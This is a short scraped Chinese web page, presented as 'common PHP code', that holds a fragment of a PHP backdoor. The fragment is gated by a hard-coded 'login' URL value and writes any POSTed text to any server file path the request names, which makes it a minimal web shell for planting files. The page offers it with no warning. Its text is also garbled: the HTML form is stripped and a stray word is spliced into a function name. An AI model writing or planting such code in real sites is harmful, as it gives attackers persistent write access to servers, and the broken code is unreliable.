【www.gdgbn.com--php常用代码】

if($_get["login"]=="fuying"){
header("content-type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_post as $k=>$v) $_post[$k] = strips教程lashes($v);
?>


save to: ">









if(isset($_post["file"]))
{
   $fp = @fopen($_post["file"],"wb");
   echo @fwrite($fp,$_post["text"]) ? "succed!" : "faled!";
   @fclose($fp);
}
}

本文来源:http://www.gdgbn.com/jiaocheng/28460/